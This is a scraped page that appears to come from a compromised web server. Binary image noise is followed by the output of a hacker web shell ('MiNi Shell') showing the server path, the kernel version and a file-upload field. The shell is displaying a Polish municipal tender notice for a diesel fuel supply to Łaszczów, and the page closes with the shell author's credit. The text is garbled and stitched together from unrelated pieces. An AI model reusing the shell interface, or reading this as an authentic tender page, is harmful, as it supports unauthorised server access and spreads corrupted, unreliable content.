JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250305/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250305/0013248901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa oleju napędowego na potrzeby Urzędu Miejskiego w Łaszczowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Łaszczów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950368954</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Chopina 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łaszczów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-650</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@laszczow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://umlaszczow.bip.lubelskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa oleju napędowego na potrzeby Urzędu Miejskiego w Łaszczowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-60743f93-1f80-472b-9734-a89d4a77327f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00132489</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00020097/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa oleju napędowego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-60743f93-1f80-472b-9734-a89d4a77327f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia która jest dostępna pod adresem https://ezamowienia.gov.pl .<br/>Korzystanie z Platformy e-Zamówienia jest bezpłatne. Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”,<br/>widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Składanie oświadczeń, wniosków, zawiadomień<br/>oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem „Formularzy do komunikacji” w formie załączników.<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych (za wyjątkiem oferty i dokumentów składanych<br/>wraz z ofertą) za pomocą poczty elektronicznej, na adres e-mail przetargi@laszczow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa<br/>Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w<br/>zakładce „Centrum Pomocy”. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy<br/>e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia . Maksymalny rozmiar<br/>plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB. (wielkość ta dotyczy plików przesyłanych jako<br/>załączniki do jednego formularza). Oferta powinna być sporządzona w języku polskim, pod rygorem nieważności w formie<br/>elektronicznej czyli opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego<br/>2005r. o informatyzacji działalności podmiotów. Do oferty należy dołączyć oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu<br/>warunków udziału w postępowaniu, sporządzone pod rygorem nieważności w postaci elektronicznej, podpisane kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGN.271.5.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa oleju napędowego gatunku ON B0 bez dodatku estrów – w ilości 20.000<br/>litrów na potrzeby Urzędu Miejskiego w Łaszczowie.<br/>Paliwa muszą spełniać wymagania jakościowe określone w Rozporządzeniu Ministra Klimatu i Środowiska z dnia<br/>26.06.2024 r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz. U. z 2024 poz. 1018) oraz Polskich Normach.<br/>Szczegółowy opis przedmiotu zamówienia<br/>Minimalne parametry oleju napędowego ON B0 (bez dodatku estrów):<br/>a) gęstość w temperaturze 15°C nie może być większa niż 820 kg/m3;<br/>b) temperatura zapłonu nie może być niższa niż 55°C;<br/>c) zawartość siarki nie może być wyższa niż 10 mg/kg;<br/>d) zawartość wody nie może być wyższa niż 0,020 % (m/m);<br/>e) zawartość ciał stałych nie może być wyższa niż 24 mg/kg;<br/>f) barwa przeźroczysta, bezbarwna - żółta<br/>Paliwo będzie dostarczane autocysternami Wykonawcy i na jego koszt. Cena transportu powinna być wliczona w cenę oleju<br/>napędowego. Wysokość ceny jest uzależniona od aktualnego poziomu cen producenta paliwa. Dostawa oleju będzie<br/>realizowana sukcesywnie (partiami) – po uprzednim powiadomieniu Zamawiającego, do magazynu Zamawiającego –<br/>zbiornika o poj. 5.000 litrów na olej napędowy – usytuowanego w Łaszczowie, ul. Przemysłowa 9, 22-650 Łaszczów.<br/>Termin pojedynczej dostawy: minimum w ciągu 48 godzin, maksymalnie w ciągu 72 godzin od zgłoszenia dokonanego<br/>drogą mailową na wskazany w umowie adres / faxem lub telefonicznie. Zaś ostateczny czas (termin) pojedynczej dostawy<br/>zostanie wskazany po dokonaniu wyboru najkorzystniejszej oferty, zgodnie z terminem dostawy, który został zadeklarowany<br/>w wybranej ofercie.<br/>- Ostateczne ilości jednorazowej zakupu paliwa będą zależne od bieżących potrzeb Zamawiającego. Minimalna ilość<br/>jednorazowej dostawy będzie wynosić 2.500 litrów, częstotliwość dostawy będzie około raz na dwa miesiące.<br/>- Wykonawca ponosi odpowiedzialność za jakość dostarczonego paliwa.<br/>Zamawiający zastrzega sobie prawo do niewykorzystania pełnego limitu ilościowego, bez prawa roszczeń z tego tytułu<br/>przez Wykonawcę dla zamówienia. Zmniejszenie tej ilości odbywać się będzie na podstawie oświadczenia Zamawiającego.<br/>Zmniejszenie do 30% ilości nie wymaga aneksowania umowy. W takim wypadku minimalna wysokość wynagrodzenia, które<br/>będzie przysługiwać wykonawcy, wyniesie 70% wartości zamówienia.<br/>Zamawiający zastrzega sobie możliwość rozszerzenia zakresu zamówienia przy zastosowaniu prawa opcji, o którym mowa<br/>w art. 441 ust. 1 ustawy Prawo zamówień publicznych, tj. zwiększenia w okresie realizacji umowy dla zamówienia<br/>wskazanego w postępowaniu o nie więcej niż 30% w stosunku do ilości stanowiących przedmiot zamówienia<br/>podstawowego. Wykonawca zobowiązuje się w takim przypadku umożliwić Zamawiającemu zakup dodatkowych ilości<br/>paliwa, jeżeli zajdzie taka potrzeba Zamawiającego, na takich samych zasadach jak dostawy objęte zamówieniem<br/>podstawowym.<br/>Prawo opcji jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji niniejszej<br/>umowy. W przypadku nieskorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z<br/>tego tytułu. W przypadku skorzystania z prawa opcji, zmiany umowy lub zawarcie umowy odrębnej nie będą wymagane.<br/>Zamawiający zobowiązuje się do zapłaty ceny zgodnie z wynikami przetargu na warunkach określonych w niniejszej<br/>umowie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09134100-8 - Olej napędowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09000000-3 - Produkty naftowe, paliwo, energia elektryczna i inne źródła energii</p> <p class="mb-0">09100000-0 - Paliwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie możliwość rozszerzenia zakresu zamówienia przy zastosowaniu prawa opcji, o którym mowa<br/>w art. 441 ust. 1 ustawy Prawo zamówień publicznych, tj. zwiększenia w okresie realizacji umowy dla zamówienia<br/>wskazanego w postępowaniu o nie więcej niż 30% w stosunku do ilości stanowiących przedmiot zamówienia<br/>podstawowego. Wykonawca zobowiązuje się w takim przypadku umożliwić Zamawiającemu zakup dodatkowych ilości<br/>paliwa, jeżeli zajdzie taka potrzeba Zamawiającego, na takich samych zasadach jak dostawy objęte zamówieniem<br/>podstawowym. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu w zakresie:<br/>- uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej o ile wynika to z odrębnych przepisów;<br/>- posiadają aktualną koncesję na obrót paliwami w zakresie niezbędnym do realizacji przedmiotu zamówienia wydaną przez<br/>Prezesa Urzędu Regulacji Energetyki – ustawa z dnia 10 kwietnia 1997 r., Prawo energetyczne (t.j. Dz.U. z 2024 r., poz.<br/>266 ze zm.), <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Na wezwanie zamawiającego po otwarciu ofert Wykonawca zobowiązany jest do złożenia następujących oświadczeń i dokumentów - w celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w postępowaniu:<br/>	aktualnej koncesji na obrót paliwami w zakresie niezbędnym do realizacji przedmiotu zamówienia wydaną przez Prezesa Urzędu Regulacji Energetyki – ustawa z dnia 10 kwietnia 1997 r., Prawo energetyczne (t.j. Dz.U. z 2024 r., poz. 266 ze zm.).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek ustanowić<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i do zawarcia umowy w sprawie zamówienia publicznego oraz<br/>dołączyć do oferty w postaci elektronicznej.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa<br/>każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te powinny<br/>potwierdzać brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 8 / Zmiana umowy (Projektowane postanowienia umowy)<br/>1. Wszelkie zmiany i uzupełnienia niniejszej Umowy wymagają zachowania pod rygorem nieważności formy pisemnej.<br/>2. Zamawiający przewiduje możliwość zmiany niniejszej Umowy, w stosunku do treści oferty, na podstawie której dokonano<br/>wyboru Wykonawcy.<br/>3. Zmiany Umowy, o których mowa w ust. 2, mogą nastąpić w przypadku zaistnienia co najmniej jednej z następujących<br/>okoliczności:<br/>1) w przypadku uchwalenia lub zmiany powszechnie obowiązujących przepisów prawa krajowego i wspólnotowego oraz<br/>wytycznych, zaleceń i dokumentów programowych, z których treści wynika konieczność lub zasadność wprowadzenia zmian<br/>Umowy;<br/>2) w przypadku, gdy konieczność zmiany Umowy wynikać będzie z umów, wytycznych, zaleceń, decyzji lub innych<br/>dokumentów, którymi stroną lub autorem będą instytucje finansujące dostawę lub inne organy publiczne albo sądy;<br/>3) podczas wykonania przedmiotu Umowy zaistnieje konieczność dokonania uszczegółowienia, wykładni lub<br/>doprecyzowania poszczególnych zapisów Umowy, niepowodujących zmiany celu i istoty Umowy;<br/>4) obiektywnie jest to niezbędne dla zachowania i realizacji celów Umowy, dla których została ona zawarta;<br/>5) w przypadku zaistnienia innej istotnej zmiany okoliczności powodującej, że wykonanie Umowy bez dokonania jej zmian<br/>nie leży w interesie publicznym, czego nie można było przewidzieć na etapie zawierania Umowy;<br/>6) zaistnieje potrzeba zmiany dokonana na podstawie uzgodnionych możliwość wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w opisie;<br/>7) zmiany terminu wykonania umowy w przypadku zaistnienia siły wyższej, czyli zdarzenia, którego nie można było<br/>przewidzieć; maksymalny okres przesunięcia terminu zakończenia umowy będzie równy okresowi przerwy w świadczeniu<br/>dostawy;<br/>4. Zmiana umowy może także nastąpić w przypadkach, o których mowa w art. 455 ust. 1 pkt 2-4 oraz ust. 2 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć za pośrednictwem Platformy e-Zamówienia (https://e-zamówienia.gov.pl)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-13 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-11</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com